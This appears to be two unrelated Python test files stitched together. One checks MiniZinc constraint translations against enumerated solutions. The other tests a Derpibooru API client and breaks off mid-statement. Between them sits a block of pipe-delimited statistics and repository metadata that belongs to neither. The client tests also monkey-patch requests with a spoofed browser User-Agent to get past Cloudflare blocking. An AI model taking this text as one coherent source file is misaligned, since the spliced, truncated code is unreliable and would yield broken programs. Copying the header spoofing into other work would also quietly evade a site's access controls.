    check("tests/mzn/int_lin_eq_imp_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and (3*a + 2*b) == 26) or (not r)], optstr=2)
    check("tests/mzn/int_lin_le_1.mzn", [[f"a={a}", f"b={b}"] for a,b in itertools.product(range(-3,10), range(-5,6)) if (3*a + 2*b) <= 26])
    check("tests/mzn/int_lin_le_reif_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and (3*a + 2*b) <= 26) or (not r and (3*a + 2*b) > 26)])
    check("tests/mzn/int_lin_le_imp_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and (3*a + 2*b) <= 26) or (not r)])
    check("tests/mzn/int_lin_ne_1.mzn", [[f"a={a}", f"b={b}"] for a,b in itertools.product(range(-3,10), range(-5,6)) if (3*a + 2*b) != 26])
    check("tests/mzn/int_lin_ne_reif_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and (3*a + 2*b) != 26) or (not r and (3*a + 2*b) == 26)])
    check("tests/mzn/int_lin_ne_imp_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and (3*a + 2*b) != 26) or (not r)])
    check("tests/mzn/int_lt_1.mzn", [[f"a={a}", f"b={b}"] for a,b in itertools.product(range(-3,10), range(-5,6)) if a < b])
    check("tests/mzn/int_lt_reif_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and a < b) or (not r and a >= b)])
    check("tests/mzn/int_lt_imp_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and a < b) or (not r)])
    check("tests/mzn/int_max_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] for a,b,c in itertools.product(range(-3,10), range(-5,6), range(8)) if c == max(a,b)])
    check("tests/mzn/int_min_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] for a,b,c in itertools.product(range(-3,10), range(-5,6), range(8)) if c == min(a,b)])
    #revisit to maybe avoid symmetries ?
    # MiniZinc mod takes the sign of the dividend; Python's % takes the divisor's, hence the sign juggling.
    check("tests/mzn/int_mod_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] for a,b,c in itertools.product(range(-3,10), itertools.chain(range(-5,0), range(1,6)), range(8)) if (a*b>0 and a%b == c) or ( a*b<=0 and (-a%b) == -c)], comp = operator.ge)
    check("tests/mzn/int_ne_1.mzn", [[f"a={a}", f"b={b}"] for a,b in itertools.product(range(-3,10), range(-5,6)) if a != b])
    check("tests/mzn/int_ne_reif_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and a != b) or (not r and a == b)])
    check("tests/mzn/int_ne_imp_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and a != b) or (not r)])
    check("tests/mzn/int_plus_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] for a,b,c in itertools.product(range(-3,10), range(-5,6), range(-10,11)) if a+b==c])
    check("tests/mzn/int_pow_1.mzn", [[f"a={a}", f"b={b}", f"c={pow(a,b)}"] for a,b in itertools.product(range(1,10), range(0,6)) if 0 <= pow(a,b) <=100])
    check("tests/mzn/int_times_1.mzn", [[f"a={a}", f"b={b}", f"c={a*b}"] for a,b in itertools.product(range(-3,10), range(-5,6)) if -100 <= a*b <=100])
    check("tests/mzn/set_in_1.mzn", [[f"a={a}"] for a in range(-10,131) if a in [-4,3,4,5,123]])
    check("tests/mzn/set_in_reif_1.mzn", [[f"a={a}"] + toBool(r,"r") for a,r in itertools.product(range(-10,131), BOOL) if (r and a in [-4,3,4,5,123]) or (not r and a not in [-4,3,4,5,123])])
    check("tests/mzn/set_in_imp_1.mzn", [[f"a={a}"] + toBool(r,"r") for a,r in itertools.product(range(-10,131), BOOL) if (r and a in [-4,3,4,5,123]) or (not r)], optstr=2)
    ### boolean builtins
    # no reif or imp possible, minizinc bug ?
    check("tests/mzn/array_bool_and_1.mzn", [toBool(a1,"a1",a2,"a2",a3,"a3",r,"r") for a1,a2,a3,r in itertools.product(BOOL, BOOL, BOOL, BOOL) if (r and (a1 and a2 and a3)) or (not r and not (a1 and a2 and a3))])
    # no reif or imp needed
    check("tests/mzn/array_bool_element_1.mzn", [[f"b={b}"] + toBool(c,"c") for b,c in itertools.product(range(1,10), BOOL) if (c and b in [1,2,4,5,8,9]) or (not c and b not in [1,2,4,5,8,9])])
    # no reif or imp possible, minizinc bug ?
    check("tests/mzn/array_bool_or_1.mzn", [toBool(a1,"a1",a2,"a2",a3,"a3",r,"r") for a1,a2,a3,r in itertools.product(BOOL, BOOL, BOOL, BOOL) if (r and (a1 or a2 or a3)) or (not r and not (a1 or a2 or a3))])
    # no reif or imp possible, minizinc bug ?
    check("tests/mzn/array_bool_xor_1.mzn", [toBool(a1,"a1",a2,"a2",a3,"a3",a4,"a4") for a1,a2,a3,a4 in itertools.product(BOOL, BOOL, BOOL, BOOL) if (a1 ^ a2 ^ a3 ^ a4) ])
    # no reif or imp needed, translation is ok
    # eval(f'a{b}') picks the b-th comprehension variable as the selected array element.
    check("tests/mzn/array_var_bool_element_1.mzn", [[f"b={b}"] + toBool(a1,"a1",a2,"a2",a3,"a3",a4,"a4",a5,"a5",a6,"a6",a7,"a7",a8,"a8",a9,"a9",c,"c") for b,a1,a2,a3,a4,a5,a6,a7,a8,a9,c in itertools.product(range(1,10), BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL) if eval(f'a{b}')==c ])
    # this only works for -O0 currently, minizinc bug
    check("tests/mzn/bool2int_1.mzn", [[f"b={b}"] + toBool(c,"c") for b,c in itertools.product(range(0,10), BOOL) if (c and b == 1) or (not c and b == 0)])
    # no reif or imp possible, minizinc bug ?
    check("tests/mzn/bool_and_1.mzn", [toBool(a,"a",b,"b",r,"r") for a,b,r in itertools.product(BOOL, BOOL, BOOL) if (r and (a and b) or (not r and not (a and b)))])
    check("tests/mzn/bool_clause_1.mzn", [toBool(a1,"a1",a2,"a2",a3,"a3",a4,"a4",a5,"a5",a6,"a6",a7,"a7",a8,"a8",a9,"a9") for a1,a2,a3,a4,a5,a6,a7,a8,a9 in itertools.product(BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL) if a1 or a2 or a3 or a4 or not a5 or not a6 or not a7 or not a8 or not a9 ])
    check("tests/mzn/bool_clause_reif_1.mzn", [toBool(a1,"a1",a2,"a2",a3,"a3",a4,"a4",a5,"a5",a6,"a6",a7,"a7",a8,"a8",a9,"a9",r,"r") for a1,a2,a3,a4,a5,a6,a7,a8,a9,r in itertools.product(BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL) if r and (a1 or a2 or a3 or a4 or not a5 or not a6 or not a7 or not a8 or not a9) or (not r and not (a1 or a2 or a3 or a4 or not a5 or not a6 or not a7 or not a8 or not a9)) ])
    # does not exist ?
    check("tests/mzn/bool_clause_imp_1.mzn", [toBool(a1,"a1",a2,"a2",a3,"a3",a4,"a4",a5,"a5",a6,"a6",a7,"a7",a8,"a8",a9,"a9",r,"r") for a1,a2,a3,a4,a5,a6,a7,a8,a9,r in itertools.product(BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL) if r and (a1 or a2 or a3 or a4 or not a5 or not a6 or not a7 or not a8 or not a9) or (not r) ], optstr=2) # minizinc introduces symmetries on -O0
    check("tests/mzn/bool_eq_1.mzn", [toBool(a,"a",b,"b") for a,b in itertools.product(BOOL, BOOL) if (a == b)])
    check("tests/mzn/bool_eq_reif_1.mzn", [toBool(a,"a",b,"b",r,"r") for a,b,r in itertools.product(BOOL, BOOL, BOOL) if (r and (a == b) or (not r and not (a == b)))])
    check("tests/mzn/bool_eq_imp_1.mzn", [toBool(a,"a",b,"b",r,"r") for a,b,r in itertools.product(BOOL, BOOL, BOOL) if (r and (a == b) or (not r))], optstr=2)
    check("tests/mzn/bool_le_1.mzn", [toBool(a,"a",b,"b") for a,b in itertools.product(BOOL, BOOL) if (a <= b)])
    check("tests/mzn/bool_le_reif_1.mzn", [toBool(a,"a",b,"b",r,"r") for a,b,r in itertools.product(BOOL, BOOL, BOOL) if (r and (a <= b) or (not r and not (a <= b)))])
    check("tests/mzn/bool_le_imp_1.mzn", [toBool(a,"a",b,"b",r,"r") for a,b,r in itertools.product(BOOL, BOOL, BOOL) if (r and (a <= b) or (not r))], optstr=2)
    check("tests/mzn/bool_lt_1.mzn", [toBool(a,"a",b,"b") for a,b in itertools.product(BOOL, BOOL) if (a < b)])
    check("tests/mzn/bool_lt_reif_1.mzn", [toBool(a,"a",b,"b",r,"r") for a,b,r in itertools.product(BOOL, BOOL, BOOL) if (r and (a < b) or (not r and not (a < b)))])
    check("tests/mzn/bool_lt_imp_1.mzn", [toBool(a,"a",b,"b",r,"r") for a,b,r in itertools.product(BOOL, BOOL, BOOL) if (r and (a < b) or (not r))], optstr=2)
    # see https://github.com/MiniZinc/libminizinc/issues/477
    # bool_lin_eq
    check("tests/mzn/bool_lin_eq_1.mzn", [toBool(a1,"a1",a2,"a2",a3,"a3",a4,"a4") + [f"c={c}"] for a1,a2,a3,a4,c in itertools.product(BOOL, BOOL, BOOL, BOOL, range(-10,13)) if (a1*3) + (a2*-2) + (a3*-5) + (a4*8) == c])
    # currently only works with -O0 by accident
    check("tests/mzn/bool_lin_eq_reif_1.mzn", [toBool(a1,"a1",a2,"a2",a3,"a3",a4,"a4",r,"r") + [f"c={c}"] for a1,a2,a3,a4,r,c in itertools.product(BOOL, BOOL, BOOL, BOOL, BOOL, range(-10,13)) if (r and (a1*3) + (a2*-2) + (a3*-5) + (a4*8) == c) or (not r and not ((a1*3) + (a2*-2) + (a3*-5) + (a4*8) == c))])
    # see https://github.com/MiniZinc/libminizinc/issues/480
    #check("tests/mzn/bool_lin_eq_imp_1.mzn", [toBool(a1,"a1",a2,"a2",a3,"a3",a4,"a4",r,"r") + [f"c={c}"] for a1,a2,a3,a4,r,c in itertools.product(BOOL, BOOL, BOOL, BOOL, BOOL, range(-10,13)) if (r and (a1*3) + (a2*-2) + (a3*-5) + (a4*8) == c) or (not r)])
    # bool_lin_le
    check("tests/mzn/bool_lin_le_1.mzn", [toBool(a1,"a1",a2,"a2",a3,"a3",a4,"a4") for a1,a2,a3,a4 in itertools.product(BOOL, BOOL, BOOL, BOOL) if (a1*3) + (a2*-2) + (a3*-5) + (a4*8) <= 10])
    check("tests/mzn/bool_lin_le_reif_1.mzn", [toBool(a1,"a1",a2,"a2",a3,"a3",a4,"a4",r,"r") for a1,a2,a3,a4,r in itertools.product(BOOL, BOOL, BOOL, BOOL, BOOL) if (r and (a1*3) + (a2*-2) + (a3*-5) + (a4*8) <= 10) or (not r and not ((a1*3) + (a2*-2) + (a3*-5) + (a4*8) <= 10))])
    # see https://github.com/MiniZinc/libminizinc/issues/480
    # check("tests/mzn/bool_lin_le_imp_1.mzn", [toBool(a1,"a1",a2,"a2",a3,"a3",a4,"a4",r,"r") for a1,a2,a3,a4,r in itertools.product(BOOL, BOOL, BOOL, BOOL, BOOL) if (r and (a1*3) + (a2*-2) + (a3*-5) + (a4*8) <= 10) or (not r)])
    # TODO: check if pb constraint is created
    check("tests/mzn/bool_lin_eq_2.mzn", [toBool(a1,"a1",a2,"a2",a3,"a3",a4,"a4") for a1,a2,a3,a4 in itertools.product(BOOL, BOOL, BOOL, BOOL) if (a1*3) + (a2*-2) + (a3*-5) + (a4*8) == 10])
    check("tests/mzn/bool_not_1.mzn", [toBool(a,"a",b,"b") for a,b in itertools.product(BOOL, BOOL) if (a != b)])
    check("tests/mzn/bool_or_1.mzn", [toBool(a,"a",b,"b",r,"r") for a,b,r in itertools.product(BOOL, BOOL, BOOL) if (r and (a or b) or (not r and not (a or b)))])
    check("tests/mzn/bool_xor_1.mzn", [toBool(a,"a",b,"b",r,"r") for a,b,r in itertools.product(BOOL, BOOL, BOOL) if (r and (a ^ b) or (not r and not (a ^ b)))])
    check("tests/mzn/bool_xor_2.mzn", [toBool(a,"a",b,"b") for a,b in itertools.product(BOOL, BOOL) if (a ^ b)])
    ### 2.0.0
    #array_int_max/minimum already in std builtins
    #array_bool_clause_reif already in std builtins
    ### redefined globals
    check("tests/mzn/count_eq_par_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] for a,b,c in itertools.product(range(-3,10), range(-5,6), range(0,9)) if [a,b,c].count(7)==2 ])
    check("tests/mzn/count_geq_par_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] for a,b,c in itertools.product(range(-3,10), range(-5,6), range(0,9)) if [a,b,c].count(7)<=2 ])
    check("tests/mzn/count_gt_par_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] for a,b,c in itertools.product(range(-3,10), range(-5,6), range(0,9)) if [a,b,c].count(7)<2 ])
    check("tests/mzn/count_leq_par_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] for a,b,c in itertools.product(range(-3,10), range(-5,6), range(0,9)) if [a,b,c].count(7)>=2 ])
    check("tests/mzn/count_lt_par_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] for a,b,c in itertools.product(range(-3,10), range(-5,6), range(0,9)) if [a,b,c].count(7)>2 ])
    check("tests/mzn/count_neq_par_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] for a,b,c in itertools.product(range(-3,10), range(-5,6), range(0,9)) if [a,b,c].count(7)!=2 ])
    check("tests/mzn/count_eq_par_reif_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] + toBool(r,"r") for a,b,c,r in itertools.product(range(-3,10), range(-5,6), range(0,9), BOOL) if (r and [a,b,c].count(7)==2) or (not r and not ([a,b,c].count(7)==2)) ])
    check("tests/mzn/count_geq_par_reif_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] + toBool(r,"r") for a,b,c,r in itertools.product(range(-3,10), range(-5,6), range(0,9), BOOL) if (r and [a,b,c].count(7)<=2) or (not r and not ([a,b,c].count(7)<=2)) ])
    check("tests/mzn/count_gt_par_reif_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] + toBool(r,"r") for a,b,c,r in itertools.product(range(-3,10), range(-5,6), range(0,9), BOOL) if (r and [a,b,c].count(7)<2) or (not r and not ([a,b,c].count(7)<2)) ])
    check("tests/mzn/count_leq_par_reif_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] + toBool(r,"r") for a,b,c,r in itertools.product(range(-3,10), range(-5,6), range(0,9), BOOL) if (r and [a,b,c].count(7)>=2) or (not r and not ([a,b,c].count(7)>=2)) ])
    check("tests/mzn/count_lt_par_reif_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] + toBool(r,"r") for a,b,c,r in itertools.product(range(-3,10), range(-5,6), range(0,9), BOOL) if (r and [a,b,c].count(7)>2) or (not r and not ([a,b,c].count(7)>2)) ])
    check("tests/mzn/count_neq_par_reif_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] + toBool(r,"r") for a,b,c,r in itertools.product(range(-3,10), range(-5,6), range(0,9), BOOL) if (r and [a,b,c].count(7)!=2) or (not r and not ([a,b,c].count(7)!=2)) ])
    check("tests/mzn/count_eq_par_imp_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] + toBool(r,"r") for a,b,c,r in itertools.product(range(-3,10), range(-5,6), range(0,9), BOOL) if (r and [a,b,c].count(7)==2) or (not r) ])
    check("tests/mzn/count_geq_par_imp_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] + toBool(r,"r") for a,b,c,r in itertools.product(range(-3,10), range(-5,6), range(0,9), BOOL) if (r and [a,b,c].count(7)<=2) or (not r) ])
    check("tests/mzn/count_gt_par_imp_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] + toBool(r,"r") for a,b,c,r in itertools.product(range(-3,10), range(-5,6), range(0,9), BOOL) if (r and [a,b,c].count(7)<2) or (not r) ])
    check("tests/mzn/count_leq_par_imp_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] + toBool(r,"r") for a,b,c,r in itertools.product(range(-3,10), range(-5,6), range(0,9), BOOL) if (r and [a,b,c].count(7)>=2) or (not r) ])
    check("tests/mzn/count_lt_par_imp_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] + toBool(r,"r") for a,b,c,r in itertools.product(range(-3,10), range(-5,6), range(0,9), BOOL) if (r and [a,b,c].count(7)>2) or (not r) ])
    check("tests/mzn/count_neq_par_imp_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] + toBool(r,"r") for a,b,c,r in itertools.product(range(-3,10), range(-5,6), range(0,9), BOOL) if (r and [a,b,c].count(7)!=2) or (not r) ])
| 124.473684
| 423
| 0.585994
| 4,212
| 18,920
| 2.565052
| 0.037987
| 0.029989
| 0.10709
| 0.129859
| 0.925768
| 0.88967
| 0.8607
| 0.844872
| 0.827842
| 0.79813
| 0
| 0.064317
| 0.136311
| 18,920
| 151
| 424
| 125.298013
| 0.596842
| 0.103806
| 0
| 0
| 0
| 0
| 0.207747
| 0.142164
| 0
| 0
| 0
| 0.006623
| 0
| 1
| 0.030612
| false
| 0
| 0.040816
| 0
| 0.081633
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
74cb7639acb4a2b91c13a9af4f41098a2e3fc78b
| 87,658
|
py
|
Python
|
tests/sync/test.py
|
luckydonald/derpipy
|
3220ca13605f97bb5422cfb2975c54028f42f880
|
[
"MIT"
] | null | null | null |
tests/sync/test.py
|
luckydonald/derpipy
|
3220ca13605f97bb5422cfb2975c54028f42f880
|
[
"MIT"
] | 1
|
2020-07-27T00:39:46.000Z
|
2020-07-27T02:27:42.000Z
|
tests/sync/test.py
|
derpipy/derpi
|
3220ca13605f97bb5422cfb2975c54028f42f880
|
[
"MIT"
] | 1
|
2020-03-21T14:40:10.000Z
|
2020-03-21T14:40:10.000Z
|
import unittest
import iso8601
import datetime
from derpi.syncrounous import (
client, Comment, Image, Intensities, Representations, DerpiModel, Tag, Post, User, Filter,
Oembed, Links, Awards, Gallery, Forum, Topic,
)
# JSON literal aliases so raw API payloads can be pasted verbatim into tests.
null = None  # JSON null
false = False  # JSON false
true = True  # JSON true
# Make model deserialization strict: fail if a payload carries fields the
# models do not consume, so schema drift is caught by the tests.
DerpiModel._assert_consuming_all_params = True
def cloudflare_blocked_request(
    cls, method, url, params=None, client=None,
):
    """Replacement for DerpiClient.request that sends a browser-like User-Agent.

    Derpibooru sits behind Cloudflare, which may block the library's default
    user agent; spoofing a desktop Chrome UA lets the test requests through.
    The `client` parameter mirrors the original signature and is unused here.
    """
    from derpi.syncrounous.client import internet
    response: internet.Response = internet.request(
        method=method, url=url, params=params,
        cookies={},
        headers={
            'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36',
        },
    )
    # Reuse the client's own status/error checking before returning.
    cls._check_response(response)
    return response
# end def


# Monkey-patch the spoofed request into the client class for all tests below.
client.DerpiClient.request = classmethod(cloudflare_blocked_request)
class OnlineTest(unittest.TestCase):
    """Integration tests against the live Derpibooru API.

    Each test fetches a known resource through `client` and asserts the
    response deserializes into the expected model type. Requires network
    access; `test_user_filters__with_key` is skipped without an API key.

    Fixes applied in review: `assertEquals` is a deprecated alias (removed
    in Python 3.12) and is replaced by `assertEqual`; locals named `filter`
    are renamed to avoid shadowing the builtin.
    """
    def test_comment(self):
        comment = client.comment(8927783)
        self.assertIsInstance(comment, Comment)
    # end def

    def test_image(self):
        image = client.image(1322277)
        self.assertIsInstance(image, Image)
    # end def

    def test_featured_image(self):
        featured_image = client.featured_image()
        self.assertIsInstance(featured_image, Image)
    # end def

    def test_tag(self):
        tag = client.tag('oc-colon-littlepip')
        self.assertIsInstance(tag, Tag)
    # end def

    def test_tag__aliased(self):
        tag = client.tag('littlepip')
        self.assertIsInstance(tag, Tag)
    # end def

    def test_tag__with_spoiler(self):
        tag = client.tag('-colon-<')
        self.assertIsInstance(tag, Tag)
        self.assertIsNotNone(tag.spoiler_image_uri)
    # end def

    def test_post(self):
        post = client.post(4704912)
        self.assertIsInstance(post, Post)
    # end def

    def test_user(self):
        user = client.user(264159)
        self.assertIsInstance(user, User)
    # end def

    def test_filter(self):
        # `filter_` avoids shadowing the `filter` builtin.
        filter_ = client.filter(179331)
        self.assertIsInstance(filter_, Filter)
    # end def

    def test_system_filters(self):
        system_filters = client.system_filters(0)
        self.assertIsInstance(system_filters, list)
        for filter_ in system_filters:
            self.assertIsInstance(filter_, Filter)
        # end for
    # end def

    def test_user_filters__with_key(self):
        try:
            from somewhere import API_KEY
        except ImportError:
            self.skipTest('no test without API key')
        # end try
        user_filters = client.user_filters(0, key=API_KEY)
        self.assertIsInstance(user_filters, list)
        for filter_ in user_filters:
            self.assertIsInstance(filter_, Filter)
        # end for
    # end def

    def test_oembed(self):
        oembed = client.oembed('https://derpibooru.org/images/2301208?q=oc%3Alittlepip')
        self.assertIsInstance(oembed, Oembed)
    # end def

    def _contains_best_pony(self, text):
        """Case-insensitively check that `text` contains 'best' plus a pony word stem."""
        text = text.lower()
        if 'best' not in text:
            return False
        if not any([
            stem in text
            for stem in ['pony', 'ponies']
        ]):
            return False
        # end if
        return True
    # end def

    def test_search_comments(self):
        search_comments = client.search_comments('best pony')
        self.assertIsInstance(search_comments, list)
        for comment in search_comments:
            self.assertIsInstance(comment, Comment)
            self.assertTrue(self._contains_best_pony(comment.body), f'should contain "best pony" or similar in comment body: {comment.body!r}')
        # end for
    # end def

    def test_search_galleries(self):
        search_galleries = client.search_galleries('best pony')
        self.assertIsInstance(search_galleries, list)
        for gallery in search_galleries:
            self.assertIsInstance(gallery, Gallery)
            self.assertTrue(self._contains_best_pony(gallery.title) or self._contains_best_pony(gallery.description), f'should contain "best pony" or similar in gallery title or description: {gallery.title!r} and {gallery.description}')
        # end for
    # end def

    def test_search_posts(self):
        search_posts = client.search_posts('best pony')
        self.assertIsInstance(search_posts, list)
        for post in search_posts:
            self.assertIsInstance(post, Post)
            self.assertTrue(self._contains_best_pony(post.body), f'should contain "best pony" or similar in post body: {post.body!r}')
        # end for
    # end def

    def test_search_images(self):
        items = 2
        search_images = client.search_images(query='littlepip', per_page=items)
        self.assertIsInstance(search_images, list)
        # was assertEquals: deprecated alias, removed in Python 3.12.
        self.assertEqual(len(search_images), items)
        for image in search_images:
            self.assertIsInstance(image, Image)
            self.assertIn('oc:littlepip', image.tags)
        # end for
    # end def

    def test_search_tags(self):
        search_tags = client.search_tags('littlepip', page=1)
        self.assertIsInstance(search_tags, list)
        self.assertTrue(search_tags)
        for tag in search_tags:
            self.assertIsInstance(tag, Tag)
            self.assertIn('littlepip', tag.name)
        # end for
    # end def

    def test_search_reverse(self):
        search_reverse = client.search_reverse(url='https://derpicdn.net/img/view/2016/2/3/1079240.png')
        self.assertIsInstance(search_reverse, list)
        self.assertTrue(search_reverse)
        self.assertEqual(len(search_reverse), 1, 'should have exactly 1 result')
        self.assertIsInstance(search_reverse[0], Image)
        self.assertEqual(search_reverse[0].id, 1079240)
    # end def

    def test_forums(self):
        forums = client.forums()
        self.assertIsInstance(forums, list)
        self.assertTrue(forums)
        for forum in forums:
            self.assertIsInstance(forum, Forum)
        # end for
    # end def

    def test_forum(self):
        forum = client.forum('rp')
        self.assertIsInstance(forum, Forum)
        self.assertEqual(forum.short_name, 'rp')
        self.assertTrue(forum)
    # end def

    def test_forum_topics(self):
        forum_topics = client.forum_topics('art')
        self.assertIsInstance(forum_topics, list)
        self.assertTrue(forum_topics)
        for forum_topic in forum_topics:
            self.assertIsInstance(forum_topic, Topic)
        # end for
    # end def

    def test_forum_topic(self):
        forum_topic = client.forum_topic('art', 'featured-image')
        self.assertIsInstance(forum_topic, Topic)
        self.assertEqual(forum_topic.slug, 'featured-image')
        self.assertTrue(forum_topic)
    # end def

    def test_forum_posts(self):
        forum_posts = client.forum_posts('generals', 'time-wasting-thread-30-sfw-no-explicitgrimdark', page=4458)
        self.assertIsInstance(forum_posts, list)
        self.assertTrue(forum_posts)
        for forum_post in forum_posts:
            self.assertIsInstance(forum_post, Post)
        # end for
    # end def

    def test_forum_post(self):
        forum_post = client.forum_post('art', 'featured-image', 4758123)
        self.assertIsInstance(forum_post, Post)
        self.assertEqual(forum_post.id, 4758123)
        self.assertTrue(forum_post)
    # end def
# end class
class OfflineTest(unittest.TestCase):
def test_image(self):
    """Offline parsing: a captured `image` API payload must deserialize into an
    Image equal to one constructed field-by-field.

    NOTE: `true`/`false`/`null` are bare names here — presumably module-level
    aliases for True/False/None defined elsewhere in this file so JSON can be
    pasted verbatim; verify they exist at module scope.
    Naive ISO timestamps in the payload become tz-aware UTC datetimes.
    """
    image = Image.from_dict({
        "image": {
            "mime_type": "image/png",
            "tag_ids": [24249, 26029, 27084, 28087, 29252, 33855, 36710, 38185, 40482, 41554, 41769, 42627, 43713, 44356, 45218, 47596, 48683, 49989, 54099, 60900, 70995, 75881, 82531, 83246, 98475, 109992, 129556, 140006, 141241, 169378, 173557, 178114, 186417, 187857, 191172, 210505, 234813, 243362, 355725, 373735, 377490, 407683],
            "comment_count": 63,
            "score": 1103,
            "downvotes": 11,
            "thumbnails_generated": true,
            "wilson_score": 0.9792839499360272,
            "source_url": "https://twitter.com/KamDrawings/status/1123822106784010240",
            "aspect_ratio": 1.7454090150250416,
            "sha512_hash": "ef377b5ce9b6abb39701bded38d9588e8ee6c28a6bc384d764237a9800356860484351be1f992c2c76a6db9425eb5171d260fde351c92e0615c4af7a3024156f",
            "orig_sha512_hash": "ef377b5ce9b6abb39701bded38d9588e8ee6c28a6bc384d764237a9800356860484351be1f992c2c76a6db9425eb5171d260fde351c92e0615c4af7a3024156f",
            "first_seen_at": "2019-05-02T05:33:36",
            "height": 1198,
            "intensities": {
                "ne": 43.666426229379056,
                "nw": 55.8670966658656,
                "se": 29.931677346829446,
                "sw": 43.073299224516546
            },
            "hidden_from_users": false,
            "name": "cacaw.png",
            "spoilered": false,
            "description": "bird.",
            "uploader": "Kam3E433",
            "tag_count": 42,
            "processed": true,
            "duration": 0.04,
            "representations": {
                "full": "https://derpicdn.net/img/view/2019/5/2/2028858.png",
                "large": "https://derpicdn.net/img/2019/5/2/2028858/large.png",
                "medium": "https://derpicdn.net/img/2019/5/2/2028858/medium.png",
                "small": "https://derpicdn.net/img/2019/5/2/2028858/small.png",
                "tall": "https://derpicdn.net/img/2019/5/2/2028858/tall.png",
                "thumb": "https://derpicdn.net/img/2019/5/2/2028858/thumb.png",
                "thumb_small": "https://derpicdn.net/img/2019/5/2/2028858/thumb_small.png",
                "thumb_tiny": "https://derpicdn.net/img/2019/5/2/2028858/thumb_tiny.png"
            },
            "width": 2091,
            "id": 2028858,
            "deletion_reason": null,
            "view_url": "https://derpicdn.net/img/view/2019/5/2/2028858__safe_artist-colon-kam_gallus_sandbar_earth+pony_griffon_pony_airhorn_alarmed_behaving+like+a+bird_birb_birds+doing+bird+things_blue+background_blue+eye.png",
            "created_at": "2019-05-02T05:33:36",
            "updated_at": "2020-04-10T00:14:35",
            "faves": 813,
            "size": 1810951,
            "animated": false,
            "upvotes": 1114,
            "format": "png",
            "duplicate_of": null,
            "uploader_id": 459261,
            "tags": ["cute", "earth pony", "feather", "frown", "griffon", "male", "open mouth", "pony", "safe", "shocked", "simple background", "speech", "surprised", "text", "this will end in tears", "wings", "solo focus", "this will end in pain", "mismatched eyes", "caw", "airhorn", "alarmed", "featured image", "exclamation point", "wide eyes", "gradient background", "catbird", "behaving like a bird", "birb", "blue eyes", "blue background", "griffons doing bird things", "offscreen character", "spread wings", "hoof hold", "quadrupedal", "gallus", "this will end in deafness", "sandbar", "gallabetes", "birds doing bird things", "artist:kam"]
        },
        "interactions": []
    }['image'])
    # Hand-built reference object: every field of the payload above, explicitly.
    expected = Image(aspect_ratio=1.7454090150250416, comment_count=63, created_at=datetime.datetime(2019, 5, 2, 5, 33, 36, tzinfo=datetime.timezone.utc), deletion_reason=None, description='bird.', downvotes=11, duplicate_of=None, faves=813, first_seen_at=datetime.datetime(2019, 5, 2, 5, 33, 36, tzinfo=datetime.timezone.utc), format='png', height=1198, hidden_from_users=False, id=2028858, intensities=Intensities(ne=43.666426229379056, nw=55.8670966658656, se=29.931677346829446, sw=43.073299224516546), mime_type='image/png', name='cacaw.png', orig_sha512_hash='ef377b5ce9b6abb39701bded38d9588e8ee6c28a6bc384d764237a9800356860484351be1f992c2c76a6db9425eb5171d260fde351c92e0615c4af7a3024156f', processed=True, representations=Representations(full='https://derpicdn.net/img/view/2019/5/2/2028858.png', large='https://derpicdn.net/img/2019/5/2/2028858/large.png', medium='https://derpicdn.net/img/2019/5/2/2028858/medium.png', small='https://derpicdn.net/img/2019/5/2/2028858/small.png', tall='https://derpicdn.net/img/2019/5/2/2028858/tall.png', thumb='https://derpicdn.net/img/2019/5/2/2028858/thumb.png', 